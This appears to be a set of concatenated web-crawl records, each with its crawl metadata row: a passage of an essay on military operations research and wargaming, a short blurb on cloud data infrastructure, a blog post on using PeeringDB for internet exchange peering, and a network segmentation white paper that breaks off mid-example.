convoy protection and anti-submarine warfare.
OR The Packaged Art
The reason OR had to be reinvented time and again was because no one in the past established OR as a distinct discipline. This was common in the ancient world, where many modern devices, like the steam engine, were invented, but there were no trained engineers to bring such devices to production and wide spread use, or to record and preserve the technology. Until the last two centuries, knowledge was acquired via apprenticeship, not formal education. But the achievements of those few who reinvented OR were always considered individual genius, not something you could package and reuse. Packaging knowledge is another 20th century movement that propelled everything else. While books have been around for thousands of years, and the modern university education was developed in the 19th century, the mass production of scientists and engineers is a 20th century innovation.
Roger Bacon invented, published and propagated the Scientific Method in the 13th century. This led to a steady and growing progress in science and engineering. OR was the next logical development in the systematic application of knowledge to problems. But we should take heed of the experience with the scientific method. This technique was used successfully by scientists, but also misused or ignored by opportunists, politicians and charlatans of all types.
OR's Few Practitioners
Because OR requires you to think clearly and methodically, there arenít many practitioners. Despite strenuous efforts, only about five percent of US army officers are familiar with OR techniques (based on an estimate I did with Army OR instructors at Ft. Lee.) And the army has cut back on the training of officers in operations research techniques. The Scientific Method is rather simpler to explain and implement than OR. The Scientific Method was a relatively simple recipe for getting to the truth. It is taught in high school science courses. OR involves a lot more imagination and heavy duty math. Coming out of World War II, U.S. flag officers were true believers in OR. Soon there were several new agencies set up to do OR type work. Outfits like the Army's Operation Research Office (ORO), the Army-Air Corps' Operations Analysis Division (OAD) and the Navy's Operations Evaluation Group (OEG after ASWORG). In the beginning, OR was considered such a broad approach to problem solving that many different disciplines were accepted as part of the process. But eventually OR practitioners like Koopman, Leach, Morse, Kimball, Newman, Solant etc. came up with a generally accepted curricula. Initially, the non-military universities providing OR instruction taught the fundamental academic subjects and some applications. This approach was less pure OR and more systems engineering and business decision/quantitative sciences. Officers obtained OR training at the Naval Post Graduate School, the Air Force Institute of Technology and the civilian schools the Army used for such training (Georgia Tech, Colorado School of Mines, Florida Institute of Technology, and MIT). Other civilian schools producing OR practitioners were; Purdue, Texas Tech, UT Austin, Ohio State, and Texas A&M. By the 1980s, the Army had created MOS 49 (Operations Research/Systems Analyst) and established a school at the Logistics Management College at Ft Lee, VA. Graduates could go right to work, or transfer to a Masters degree program with 15 credits already taken care of by the Ft Lee course. There were between two and four classes a year, with about thirty officers per class. During the same period other military schools were running two classes a year with varying number of students. Naval Postgraduate School had 40 per class, Colorado School of Mines had ten, Georgia Tech had five and AFIT 25 students per class. Graduates were sent off to places where analytical skills were needed, especially in staffs and research operations. Results were forthcoming, as a lot of the smart moves made during the 1980s were done with OR operators guidance. There were enough OR practitioners that OR cells could be set up in many key organizations. This all changed when the Cold War ended. Staffs were cut and the smart guys were the first ones to move out for greener pastures. The OR operators knew they were in demand outside the military, and also realized that someone in a narrow specialty like OR was not going to make a lot of rank. Another "peace dividend" cutback was in training for military OR specialists. The service schools for teaching OR were shut down and officers sent to civilian OR courses. This was not the same, as the military used OR differently than civilian organizations. However, sending the students to the civilian schools made it easier for these officers to get jobs when they decided to bail out.
But the very complexity of OR makes it possible to encapsulate OR as a distinct tool. This is what is happening. A black box on steroids. Going into the 21st century, we are beginning to mass produce robotic scientists and engineers. Increasingly, control devices use computers and OR techniques to run everything from automobile engines to stock portfolios. We think nothing of using powerful microprocessors and sensors to do, automatically, what once took a team of highly trained people to do. OR appliances or (ORAs) are an outgrowth of the development of expert systems and more powerful microprocessors. We already have ORAs in the form of powerful diagnostic systems on PCs and in automobiles and other vehicles. We tend to overlook the increasing amount of problem solving AI being used in machines and large systems. Diagnostic software, in particular, is making great strides.
OR and Wargames
OR has not served us as well as it could in wargaming and policy studies. Many lost opportunities have resulted. Take the Rawanda situation. The myth forming is that if troops had been sent in immediately, there would have been no genocide. In part, this is another case of amateurs studying tactics while professionals pay attention to logistics. But where are the OR studies of this situation? It's not a difficult one to do. Calculating the logistics is easy, working out the impact of peacekeeping troops on the killing is a bit more of a challenge.
More Process Than Problem Solving
Wargames are another area that could use more OR. As far as I can tell, OR shows up most often in professional wargame development as more process than problem solver. You can make a case that is how it should be, but my personal experience was that OR was the primary tool for developing a simulation of a historical conflict. OR techniques were used to solve the problem of how to develop a system that would generate reproducible results. Those of you who have played manual wargames long enough to absorb those games design techniques, and have designed your own, know what I mean. Wargame designers have abundant personal experience in making this work. I first encountered this while inadvertently predicting the outcome of the 1973 Arab-Israeli war, and more deliberately predicting the process by which the 1991 Gulf War was fought. A few years later, the lead designer on the Gulf War game found himself tasked, on very short notice, to create an accurate game of a conflict between Ecuador and Peru. His CINC gave him a medal for that effort, for the CINC considered COL Bay's overnight effort superior to what was being sent down from Washington. Even with the new wargaming MOS in the army, you still have tension between OR practitioners and wargamers. As OR types are heard saying, when you've tried everything else, try simulation. This destructive attitude was picked up in the civilian schools now teaching officers OR and is another example of how inadequate such schools are for training military OR practitioners.
Fear of Trying
Some subjects are difficult to even touch in professional wargames. And these are often issues that any straight-ahead OR analysis would encounter and deal with. But many OR operators shy away from the soft factors (morale, interpersonal relationships, fog of war and the like.) For example, one of my games (NATO Division Commander, or NDC) was adopted by the CIA as a training device in the early 1980s because it went after items CIA analysts felt were crucial, but most wargames, especially DoD wargames, avoided. Namely personnel issues among the senior leadership. NDC was part wargame, part role playing game and double blind as well. I don't think anyone ever did a game on how division staffs operate, but it was a worthy exercise. But it wasn't just the CIA that found wargames like this useful. I have continually heard from officers, with both peacetime and combat experience, who find that wargames give them an edge. The users don't have taboos about the simulation being near perfection. Like professional gamblers, the troops know that anything that puts their odds of success over 50 percent provides a tremendous advantage. Such an approach will be essential to handle things like Information Warfare (IW) or Revolution in Military Affairs (RMA). IW, for example, deals with shaping both friendly and enemy perceptions of what is happening. This is very difficult to model because there are many subjective and soft elements to be quantified. This makes it tough for traditional OR practitioners that try to deal with combat as hard science. Warfare is anything but and things like IW even less so. But historical game designers have dealt with this sort of thing successfully for decades. While traditional OR tends to focus on attrition, which is easier to model, but run these models by a military historian and they will provide numerous examples of where battles were won or lost not because of attrition but because of troop morale or one commander simply deciding he had been beaten.
One solution to the problem of making OR more useful for the troops is the concept of "Battlefield OR Appliances. (BOAs)" The business and financial community already uses such beasts (less the "Battlefield" tag) for doing complex analysis in real time. Neural nets and genetic algorithms are attractive for the business "appliances." The idea is to create apps that think quickly and accurately, far more rapidly than any human practitioner. Program trading for financial markets is based on such concepts and, although few will admit it, these trading droids are often turned loose with little human supervision (mainly because there are situations where the action is so fast that slowing the droid down so humans to keep up would cripple the usefulness of the operation.) The Air Force has been talking about BOAs in the cockpit (pilot's assistant.) The zoomies are thinking about a BOA that would wrestle with things like compensating for battle damage, other equipment problems or EW situations while the pilot continued the battle. Of course, air combat is so complex that pilots could use a little coaching in things like the maneuvers most likely to bring success in a particular operation. Ground units could also use BOAs, especially in conjunction with digitalized maps. Setting up optimal defensive positions, patrol patterns or how best to conduct a tactical move. Sailors have similar needs (and one of the first OR successes was the development of optimal search patterns for ASW.)
Imagination versus Knowledge
We live in an age of unprecedented knowledge production. Part of OR is finding the right knowledge and applying it as a solution. One of the better Japanese work habits was their diligent collection of new knowledge. This is one reason why, for several decades, they have been one jump ahead of the "more imaginative" Americans in developing popular new products for the American market. In DoD, only the Marines consistently cast a wide net for new knowledge. When commercial wargaming became popular with the military in the 1970s, it was the marines that went after it most aggressively. When the marines recently showed up on Wall Street to study the workings of financial markets, they were really on to something. The manner in which these volatile, and quite huge, markets have moved from all manual to man-machine trading (program trading, etc) has direct application for the military. And the manner in which the man-machine concepts were implemented were classic OR exercises.
Items that can be expected to happen in the future, either because they are likely, or because we can only hope.
Long a part, often an annoying one, of commercial software, these apps are constantly being beefed up to engage in more complex troubleshooting dialogs with users. There is potential here to obtain technology that can be used for battlefield OR appliances. The development work on Wizards draws heavily from decades of work on AI and Expert Systems. Much exciting OR work is going on in this area, and I believe there are already a number of military applications in development.
Troops Rolling Their Own
This has been going on since the early 1980s and the results are becoming more and more impressive. As the off-the shelf development tools become more powerful, more OR type military and wargaming apps will come from the field. These apps will co-opt the official wargames and sims in shops that want to get the job done rather than just perform the official drill. Some folks may not like this, but you won't be able to stop it.
Much of the technology for these products has long been available off the shelf. Not a lot has been taken up by the DoD crowd, at least not in peacetime. Even slower to cross over have been the commercial development standards, which put wargames to realistic testing routines and quickly modify as needed. This does get done in wartime, as witness some of the rapid development that occurred during the Gulf War. The only military organizations making use of commercial gaming technology are those outside the DoD wargaming mainstream. This is largely a political (commercial stuff is "not invented here") and contractor (doing it from scratch makes for larger contracts) one.
Process Control and Program Trading Technology
Much of this is proprietary and you'd probably need an Act of Congress to extract a lot of this technology from the firms that developed it. However, much can be obtained from trade journals and a little (legal) competitive intelligence. Most of what is being done is no secret, it's the details of the execution that are closely held. And for good reason. In the financial markets, any edge is usually small and short lived. But this is what makes this technology so valuable. The manufacturing and financial markets are "at war" all the time. They thrive or go bankrupt based on how well their "weapons" perform. And much of the technology is transferable to military uses. Many of the components of commercial apps are available as off the shelf toolboxes or widely know concepts. One of the more useful of these is known as "fuzzy logic." This item addresses many of the problems DoD wargamers have with dealing with soft factors. Civilian practitioners face the same problems and they have come up with many working solutions using fuzzy logic. In my experience, nothing is fuzzier than modeling combat.
What Percent Solution?
There may eventually be more acceptance of OR solutions that are sufficient rather than perfect. When modeling weapons or equipment performance, you can get a 100% solution (or close to it.) Many OR practitioners are more comfortable with this than those elements that involve more people and less machinery. It is currently impossible to get a 100% (or 90%, or often even 50%) solution for things like how an infantryman performs in certain situations. In peacetime, there is tendency to gold plate things. Errors of any sort are threatening to careers. In wartime, you can make mistakes. Everyone else is and the honors go to those makes the fewest. But the peacetime zero defects attitude hampers innovation and performance. You get a lot of stuff that is perfect, but doesn't work. The latest example of this was seen in the Gulf War. When a more powerful bunker buster bomb was needed, the weapon was designed, developed and delivered in less than two months and used at the end of the war. The air force also improvised a mission planning simulation in record time (using everything from spreadsheets to existing models) and used it. The army CENTCOM wargames shop also improvised (although less successfully, but this was only discovered after the war, a common occurrence in wartime.) We should also remember that during World War II, OR practitioners recognized that their calculations could not cover all critical factors. They had to work with fuzzy situations and before "fuzzy logic" became a recognized tool, the World War II operators managed to work with the problem and not just walk away muttering that "it can't be done." The current rigidity in can be traced to the relative lack of operational experience. And when operational experience does become available, it is often the case that battlefield calculations that ignored those pesky soft factors were way off. A good example of this was the analysis TRADOC did of NTC engagements. They found that the ammunition expenditure data for NTC was much different than the OR predictions, and closer to the expenditures in earlier wars. You cannot ignore dealing with the soft factors, for eventually they will bite you in the ass.
The end of the Cold War coincided with a growing demand for OR skills in the civilian sector. So many of the uniformed OR people left, and their numbers are still dwindling. Where there used to be OR groups in HQs and schools, you don't see much of this anymore. This is bad. Part of the problem is that military OR people can make more money, and have fewer unaccompanied overseas tours, as a civilian. But the numbers of uniformed OR operators is shrinking so much that the military is having a hard time properly supervising the civilian hired guns. It is also important that military OR operators be warriors (or military practitioners) first. Otherwise, you often encounter the syndrome of "if the only tool you have is a hammer, all problems look like nails." The same syndrome is noted in the civilian sector, and the solution is often to take a banker, plant manager, structural engineer or whatever and train them in OR techniques (or programming) and then turn them lose on the problems.
Putting Operations Back into OR
Originally, OR operators researched operations first hand and then devised solutions. There has been a trend away from this and towards an emphasis on technique: linear programming, dynamic programming, queuing theory, chaos theory, neural networks and so on. Knowing these techniques is a good thing, and can even be useful if you collect valid operational data. But it is not real operations research. If you can't get an experienced infantry officer as an OR analyst, then maybe you should consider sending your analysts through boot camp. Most fighter pilots have technical degrees and can pick up OR techniques quickly. Using OR trained pilots to work on combat aviation problems is an enormous advantage, for the operator with practical experience will catch things that the researcher trained only in OR will miss. Happens all the time, and the military is noticing the lack of military experience among the OR practitioners now working on military projects.
Putting the R back into OR
The "R" -research- has been largely replaced by "A"; analysis. The Navy now talks more of "OA" (Operational Analysis) than "OR" with "OA" often being considered an adjunct to Modeling and Simulation. The result has been an emphasis on quantification and metrics at the expense of understanding the problem. Like so many other debilitating trends, this one developed largely in response to what "decision-makers" have demanded. What we often have now is "advocacy analysis," where much time and effort is spent to provide justification of a position or decision based on having more and "better" numbers and metrics than your critics. This often occurs by focusing on a very narrow slice through a problem that is often far removed from the true context of the overarching problem.
Crunching Numbers versus Getting Results
There has long been a split among OR practitioners, especially in peacetime, over how best to achieve results. On one side you have the "physics" crowd, who insist on reducing every element of combat to unequivocal data and algorithms. On the other side you have the "whatever works" crew. The "physics" bunch are basically engaged in CYA (Cover Your Ass) operations, because there are many soft factors in combat that are not reducible mathematically the same way weapons effects can be.
Better OR Tools
You can't have too much of this. I'll never forget the first time I did a regression analysis. I did it manually. Try and get students to do that today and you'll get arrested for child abuse. By the 1980s we had spreadsheet plug-ins for Monte Carlo, Linear Programming and so on. I thought I'd died and gone to heaven when I first got to use that stuff. Then came MathCad, SQL on analytic steroids and more. Yes, we want more. We need more. We deserve more. If we can't get any respect, at least we can get more neat tools. Warning; too much of this stuff appears to contribute to overemphasis on analysis at the expense of getting something useful done.
Put OR Back in Uniform
A combination of vastly increased demand for civilian quants in the 1990s, reduced promotion opportunities after the Cold War, and the usual problems with having a non-mainstream MOS saw a steady decline in the number of uniformed OR operators. Norm Schwartzkopf was one of these, but he's retired, as are many other OR qualified officers. Either that or out making a lot more money as a civilian quant. I don't know how you're going to get quants back in uniform. It will take a decision at the top. In times of crises and resource shortages, a lot of really important things get shortchanged because they are difficult to understand.
Please note: This article is revised and expanded from notes used for a talk at a November, 2000 INFORMS meeting I'll be gradually editing this into a more useful format. One of the people at the talk was Mike Garrambone, a long time wargamer and former Major of Engineers (and instructor in wargaming and the AFIT.) Mike has been working on a history of OR and we are going to work together to integrate that into this document.
About the Author
If you have any comments or observations, you can contact Jim Dunnigan by e-mail at email@example.com. Jim is an author (over 20 books), wargame designer (over 100 designed and publisher of over 500), defense advisor (since the 1970s), pundit (since the 1970s) and "general troublemaker". Dunnigan graduated from Columbia University in 1970. He has been involved in developing wargames since 1966. His first game with Avalon Hill (now a part of Hasbro), "Jutland" came out in 1967. He subsequently developed another classic game, "1914", which came out in 1968. A year later he began his own game publishing company (Simulations Publications, Inc, or SPI). In 1979 he wrote a book on wargames (The Complete Wargames Handbook). In 1980 he began a book on warfare (How to Make War). In 1982 he accepted an invitation from Georgia Tech "to come down and lecture at the annual course they gave on wargaming. Been doing that ever since."
In 1985, he was asked to develop a tactical combat model to see how robotic mines would work. In 1989, he got involved editing a military history magazine (Strategy & Tactics) "which was the one I ran while at SPI." In 1989, he got involved in developing online games, and that continues. Jim edits strategypage.com.
Dunnigan, James F., "The Operations Research Revolution Rolls On, To Where?", DSSResources.COM, 05/28/2004.
James F. Dunnigan provided permission to archive this article and feature it at DSSResources.COM on Monday, December 7, 2003. This article was posted at DSSResources.COM on May 28, 2004. | <urn:uuid:c66e11d1-cba4-47b3-b7b9-2094702666b5> | CC-MAIN-2017-04 | http://dssresources.com/papers/features/dunnigan/dunnigan05282004.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279915.8/warc/CC-MAIN-20170116095119-00407-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.974777 | 5,584 | 3.078125 | 3 |
When networks exchange traffic without having a customer-provider relationship, this is called peering. We’ve talked about peering in previous Noction blog posts, such as Peering Request Etiquette, What should your peering policy look like? and Where do networks interconnect? As explained in that last blog post, there’s private and public peering. Private peering happens over a direct interconnect between the two networks involved and public peering happens over an internet exchange (IX).
Once you start looking at connecting to one or more IXes, you’ll soon find that the larger ones have many members. Fortunately, most IXes have route servers. When you peer with the IX’s route server(s), you automatically peer with all other members who also peer with the route server(s). So that’s a good start. But typically, you’ll also want to peer with other networks that don’t peer with route servers. This involves sending out large numbers of emails to potential peering partners as outlined in the Peering Request Etiquette blog post. Then, if everything happens according to plan, you’ll get a message back that the other network also wants to peer with you, and peering can commence.
At that point, you’ll have to configure one or more routers with the right information to set up a BGP session towards your new peering partner’s router. It is of course perfectly possible to find the contact info of prospective peering partners on the website of the IX or IXes you’re connected to, and then exchange the BGP session details through email. However, in practice this is a lot of work because contact info on the IX websites is often incomplete, and the BGP session details in email are unstructured, so there’s a lot of copy/paste involved.
A better way to handle this is through PeeringDB.com.
PeeringDB is a website that has information about internet exchanges and the networks that connect to those IXes. For each network, there’s a lot of information that is relevant to prospective peering partners:
- Mostly inbound traffic (access ISP) or outbound traffic (content network)
- Numbers of IPv4 and IPv6 prefixes announced
- Geographic scope: global, regional or smaller
- (Sometimes) traffic levels
- At which IXes the network is present
- Peering policy: open, selective or restrictive, in the latter cases often with a description of the policy
- Contact information
And, once you’ve agreed to peer, for each IX there’s the AS number (yes, some networks use different AS numbers in different locations!) as well as their router’s IPv4 and IPv6 addresses.
So if a peering partner has their correct information filled in on PeeringDB, you can use the website to find all the information you need to configure your BGP sessions. Well, except for your BGP MD5 passwords. You find all this information on PeeringDB without registering an account, but obviously it’s a good idea to sign up and fill in your own information for others to find. Then, rather than list the relevant information in your peering request emails, you can simply list a link to your PeeringDB information.
However, searching PeeringDB for information and then copying that information to a router configuration in order to set up BGP is still inefficient and error-prone. A better way to do this is to retrieve the desired information directly from PeeringDB using SQL queries or API calls. Unfortunately, PeeringDB no longer supports querying the database using SQL, so it’s necessary to interact with the database through the PeeringDB REST API, which requires more steps to reach the same results.
Setting up a system that queries PeeringDB requires a good amount of work up front, but once that’s done, creating router configurations becomes much easier. As a service to the community, we plan on publishing more extensive information on how to generate router configurations based on the PeeringDB contents in the near future. | <urn:uuid:f56ace66-7d10-4162-84a3-406d3f05044a> | CC-MAIN-2017-04 | https://www.noction.com/blog/using-peeringdb-to-set-up-your-internet-exchange-peering | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279915.8/warc/CC-MAIN-20170116095119-00407-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.911081 | 863 | 2.734375 | 3 |
At the core of cloud (public, private, hybrid) next generation data centers are software defined data infrastructures that exist to protect, preserve and serve applications, data along with their resulting information services. Software defined data infrastructure core components include hardware, software servers and storage configured (defined) to provide various services enabling application Performance Availability Capacity and Economics (PACE). Just as there are different types of environments, applications along with workloads various options, technologies as well as techniques exist for cloud services (and underlying data infrastructures). Join us in this session to discuss trends, technologies, tools, techniques and services options for cloud infrastructures.
- Data Infrastructures exist to support applications and their underlying resource needs
- Software Defined Infrastructures (SDDI) are what enable Software Defined Data Centers and clouds
- Various types of clouds along with cloud services that determine how resources get defined
- When, where, why and how to use cloud Infrastructures along with associated resources | <urn:uuid:ad6819f2-2ff9-42ca-a280-72bbee9c30a3> | CC-MAIN-2017-04 | https://www.brighttalk.com/channel/540/data-center-management | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280310.48/warc/CC-MAIN-20170116095120-00315-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.911251 | 208 | 2.515625 | 3 |
The convergence of the digital and physical domains will allow billions of devices to interact and exchange data in the new connected world. Important information will be pushed out to machines, to individuals, and to organizations of every type, anywhere in the world. Securing the entire ecosystem of devices, applications, users, and systems will be critically important to ensuring that only authorized data is being exchanged among different entities. Before devices can interact with each other or with humans, identifying them, building trust between devices, and creating a session context will be at the core of any secure architecture. This paper presents a segmentation framework that breaks an infrastructure into individual components and builds connection points between the relevant components based on the understanding of applications, users, consumers, threat actors, and devices.
The concept of segmentation is nothing new. In ancient history, Romans created fighting units based on the ethnic and geographic identity of captured warriors. The idea was simple: group the warriors with similar backgrounds together so they can bond and eventually become better fighting units. Throughout history, this concept has been used as a basis for creating religious, ethnic, geographic, gender-based, and political groups . As we look at the digital world, organizations have been performing user, traffic, or data segmentation through logical or physical means to protect core parts of their infrastructure.
Consolidating and centralizing the network infrastructure has been a key driver for segmentation. Previously isolated application infrastructures are now migrating to common shared physical and virtual networks that require separation to maintain some level of isolation. Similarly, networks have gone through a dramatic shift over the past few years with the introduction of virtualization, containers, smart phones, tablets, wireless connectivity and, of late, the Internet of Things (IoT). Organizations have used policy enforcement through L2 technologies such as VLANs, virtual routing and forwarding (VRF), and virtual firewalls as popular methods of providing network segmentation. The obvious question that comes to mind is, if organizations are already segmenting their network components, why do we need to discuss this topic? Before we answer this question, let us present a few data-points.
Network Designs: The traditional network architectures were built by placing the jewels of the crown (the data) in a well-guarded castle (the data-center). You get a comfortable feeling that all your critical resources are protected by a strong perimeter and nothing can pass through your defenses if not explicitly allowed. The biggest flaw with this design is: What if an unauthorized entity is already inside the castle? What if the unauthorized entity already has access to the jewels? What if the unauthorized entity has found a way to move the jewels out of your castle?
Organizations with limited segmentation and hundreds of users and applications typically experience the N*M problem, where N is the number of user groups and M is the number of critical resources, as shown in Figure 1. In plain English, every user group has access to pretty much every application in the enterprise network.
Figure 1: User Group to Resource (N*M) Relationship
The N*M problem gets worse if access is provided at an individual user level without grouping users by a set of common characteristics. Using the principle of least privilege helps simplify this problem by explicitly allowing user groups to access authorized resources. If the authorized resources are grouped together for each user group, the magnitude of this issue is reduced to just N+M. Take a closer look at the direction of the arrows in Figure 2, which illustrates a one-way segmentation policy allowing user groups to have appropriate access to the authorized resources.
Figure 2: User Group to Resource (N+M) Relationship
Data Breaches: We can all agree that the security landscape has changed in the last few years. Cyber attacks are becoming more sophisticated and targeted. If you look at recent data breaches, one thing that stands out is the layout of those networks. To keep up with business demand, most companies with large networks overlook most aspects of security, at times rendering their networks virtually flat. Additionally, most organizations have limited traffic visibility and lack properly defined segmentation policies. These data breaches demonstrate that once malicious actors have penetrated your perimeter defenses, they can roam freely in your network. As part of their reconnaissance activity, they try to determine ways to access critical resources and data. If a network is flat and users are able to access any resource with only limited security controls in place, such as authentication or IP-based access-control lists, then there is very little work an attacker needs to do to exploit those gaps.
Business Objectives: The two main goals of an organization are profitability and productivity. In many cases, organizations end up growing their network infrastructure to keep up with the demand of users and consumers. This problem is usually exacerbated by inorganic growth through acquisitions where two or more networks get connected through virtual tunnels as part of the integration process. This becomes a band-aid when quick integration is needed and security becomes an afterthought.
Application Security: In the past, applications and services were simpler and not as prevalent in the enterprise. Only a handful of applications were used throughout an enterprise by a select group of users. The applications were placed in a data center protected by a set of security and monitoring products. Although this model is relatively simple, it lacks protection for the applications that are hosted within the data center. Additionally, applications are usually grouped and separated by firewalls. However, this model lacks protection for communication between two apps when they are a part of the same app group.
User and Data Mobility: Users are not confined to the physical perimeter of an office. In this digital era there are no boundaries. Conventional data protection models do not apply anymore. Users can be anywhere, using any device, accessing data anytime, and connected through wired, wireless, or mobile infrastructure. With the evolution of smart devices, access to data is not restricted to corporate-issued devices. It does not matter how secure your castle is if the jewels are not inside the castle. Data itself could be anywhere – enterprise data center, cloud (public, private, hybrid), or a partner’s network, to name a few possibilities.
Data Visibility and Monitoring: More than 50 percent of cyber attacks are not even detected by the organization for months. If you do not have full visibility into your IT infrastructure, if you do not know who is accessing your network, what they are doing, where they are coming from, what devices they are using, and how they are hopping from one part of the network to another, how do you position yourself to defend against the threats they pose (intentionally or unintentionally, directly or indirectly)? Monitoring becomes an even bigger challenge with a lack of defined zones to determine traffic patterns.
Once acceptable security measures such as segmenting the network, configuring VLANs, deploying firewalls, and creating virtual routing tables no longer suffice. Placing users and apps into VLANs and filtering traffic through access-control lists achieves limited traffic separation. With network virtualization, cloud adoption, and proliferation of devices, it is imperative to look at the entire context of the connection before allowing access to critical data. With cyber threats evolving, providing segmentation strictly at the network layer is not enough to ensure complete data protection.
Data-Driven Segmentation Framework
What is needed is a new approach that can cater to today’s application-focused business environment, that can combine threat intelligence from various sources, and that can build a complete context around end-to-end data connections. This is an approach that can dynamically compartmentalize these data connections based on the understanding of applications, users, consumers, threat actors, and devices by building appropriate access-control methods. Currently there is no framework that breaks an infrastructure into individual components, builds connections between the relevant components, and then applies access-control models for complete traffic separation. We need a framework that is beyond the technical controls and products that are often deployed as band-aids to address these security concerns, a framework that provides senior management and network architects a blueprint to ensure that segmentation is an indispensable part of the overall strategy.
This paper presents a framework, shown in Figure 3, that centers around the business-critical resources of an enterprise. This framework helps to identify elements requiring access to those resources, builds walls around those elements, and then applies an access-control policy to authorize connections. Completing the segmentation process exercise described in this paper forces organizations to evaluate their cybersecurity program in detail, as true segmentation can only be achieved once all parts of the enterprise are evaluated at a micro level, including breaking up the infrastructure components into objects and building appropriate relationships.
Figure 3: Data-Driven Segmentation Framework
The framework is composed of the following components:
Business Critical Resource: The proposed framework starts by logically breaking up the network infrastructure and placing the business-critical resource at the center of the architecture. The business-critical resource could be anything you want to protect from unauthorized users or objects. For example, if you are in the retail business, it could be your PCI network. If you are in the healthcare industry, it could be the servers housing patient information. If you are in the automobile industry, it could be the systems containing the blueprints for your next car. What is important is that you have a process in place that gives you visibility into your network elements, and know what it is worth to you in case the critical resource is compromised. You must determine the appropriate risk involved if data is leaked to an unauthorized entity.
Objects: Once you know what your critical resources are, the next step is to break up your network architecture into different objects. These objects are discrete elements that are used to exchange data content. Common examples of objects include your user community, the devices that get access to your network, the applications that offer or host data for your consumption, and the systems that provide connectivity to applications. Here, you are identifying all elements that either reside on the network or need access to your data. Not only that, you are identifying these objects to understand data exchange flows.
The impact of these objects on building a segmentation model is significantly enhanced when you start identifying the subelements for each object. Users belonging to the sales, engineering, services, marketing, human resources, and partner organizations could all be examples of users’ sub objects. See Table 1 for a list of subelements for each object definition.
|Object||Definition||Examples of Sub Object|
|Users||Objects that can provide assigned identity information||Sales, engineering, services, marketing, human resources, partner organizations|
|Devices||Objects that require access to your infrastructure for requesting and receiving data||Corporate-issued laptops, corporate-issued mobile devices, personal mobile devices, IT-owned printers and scanners|
|Systems||Objects that control data connectivity between applications and devices||Virtual hosts, hypervisors, software images, backend databases|
|Applications||Objects that provide direct or indirect access to data through some interface||Web servers, AD/DNS/NTP servers|
Identifying and creating sub objects will allow organizations to build trust relationships between these elements. The trust relationships could be established between two distinct objects or sub objects and could also be established between two sub objects of the same element. As shown in Figure 4, two applications, Active directory (AD) and Network Time Protocol (NTP), are identified in an enterprise. Based on their relationship and data interaction, the objects belonging to AD need to communicate with the objects in NTP to synchronize their clocks. The question is, do you need to provide access to the objects in NTP when they try to access objects in AD? The answer depends on your network implementation. Don't blindly permit full communication between those objects. If you feel there is a need for the NTP servers to communicate with the AD servers, then allow it.
Figure 4: App to App Segmentation
Segmentation policies allow organizations to validate requests originating from source objects against a trust model, and then provide ways to apply an appropriate enforcement action to protect the destination object, as shown in Figure 5.
Figure 5: Segmentation Policy Example
Locations: As discussed earlier, we tend to put our jewels in a safe place by building a secure perimeter around them. What we fail to realize is that thieves might try a different approach to steal your belongings. They will not always come in from the outside. They could already be inside your safe house or could already have access to your jewels through other means. The framework needs to identify all the entry points to your critical resources. With increased adoption of cloud services, some data could be accessed outside of your control points. It is also possible that the services hosted in the cloud could have access to data in your data center.
Depending on the nature of your business, you may have an ecosystem of partners that need to access certain data. Do you know where they connect from or how they access your data? Are you sure they don’t have access to unauthorized data? The flexibility within the framework allows you to logically break apart a location into specific areas based on your organizational structure and need. See Table 2 for examples of location, their definition, and a list of sublocations.
|Location||Definition||Examples of Sub Object|
|Inside||Part of the network where user and devices connect to access network||User, guest, lab, production subnets, VPNs, industrial control space|
|Outside||Part of the network, usually not in your control, where you may not know the users or devices that access your data||Internet, Extranet|
|Cloud||Part of the network, managed and maintained by a provider, that may have access to your DMZ network||AWS, Azure, Salesforce.com|
|Vendor||Part of the network where vendors and other partners connect||Extranet, partner subnet|
With this breakdown of your network, you should be able to address whether a device belonging to the industrial control area needs access to your user network.
Identity: One of the most important components of the framework is determining the identity of objects whether they are users, devices, or applications. It is relatively easy to figure out the identity of users through your existing user database. Do you have a process in place to determine the identity of devices or applications? Do you know if a user is requesting access to data from a corporate-issued device or from a personally owned mobile device?
Similarly, in the case of a large industrial manufacturer, there could be many vendors regularly visiting the manufacturing plant to service and troubleshoot onsite devices. It is important to determine the identity of objects that are requesting access to all parts of the network. Would you allow your vendor to have full access to your inside network?
Monitor: Any security framework is incomplete if you do not have full visibility into the network architecture. Security monitoring is achieved by collecting, inspecting and analyzing traffic at various security zones. This includes collecting data from:
- IPS systems at the edge to inspect and analyze the traffic coming into your network from the outside
- Firewalls between the different objects to discover the identity and to enforce appropriate security controls
- Device profilers to discover the types of devices trying to request network access
- NetFlow systems to help you identify the types of traffic passing through your network and, more importantly, to help you identify the usage of your applications
Operational Security: Many people often think that information and network security is just about technology and products, focusing on their reliability and sophistication. They often neglect to assess their business goals against the security risks to their assets. The lack of credible and relevant security operational processes typically contributes to security breaches, including theft of personal and/or confidential data. For example, in case of a data breach, do you know:
- Which device was patient zero?
- How attackers got access to the data?
- How long it takes to detect something malicious happening?
- How long it takes to contain the incident?
- What processes were followed by the operations staff to detect anomalies?
- What is the life-cycle of the incident?
- Were patch-management or incident-management processes followed properly?
These are just some examples, but the list can be much longer. The goal is to define a set of sub processes for each high-level process (or operational area), then build metrics for each sub process. More importantly, assemble these metrics into a model that can be used to track operational improvement.
Behavioral Analytics: Out of all the different components discussed so far, behavioral analytics is the most important. It pulls everything together and completes this framework. Once you know which devices are connecting to your network, which applications are being hosted, who is requesting access, and where the objects are located, you can build a comprehensive context for a connection request and create a segmentation policy to authorize or reject the session. To achieve this you need to have the following modules in place:
- Identity module to discover objects (users, devices, applications, systems)
- Location module to know where a request is originating
- Monitoring module to collect data from all the appropriate sources (such as routers, firewalls, switches, NG-IPS, profilers, applications, hypervisors)
- Operational Security module for the analysts in a security operations center (SOC) to investigate anomalies and contain security incidents
Figure 6 provides an example where a user belonging to the sales team is requesting access to a database containing contact information for all customers in the region. The request is from an iPad currently located in the user’s home. How do we know about this connection’s attributes? Let's break it down. Assuming that the database and its front-end application are housed in a secure data center with no external access, the user has two options to access customer information:
- Connect from the corporate network
- Or, establish a secure connection (SSL VPN for example) into your network
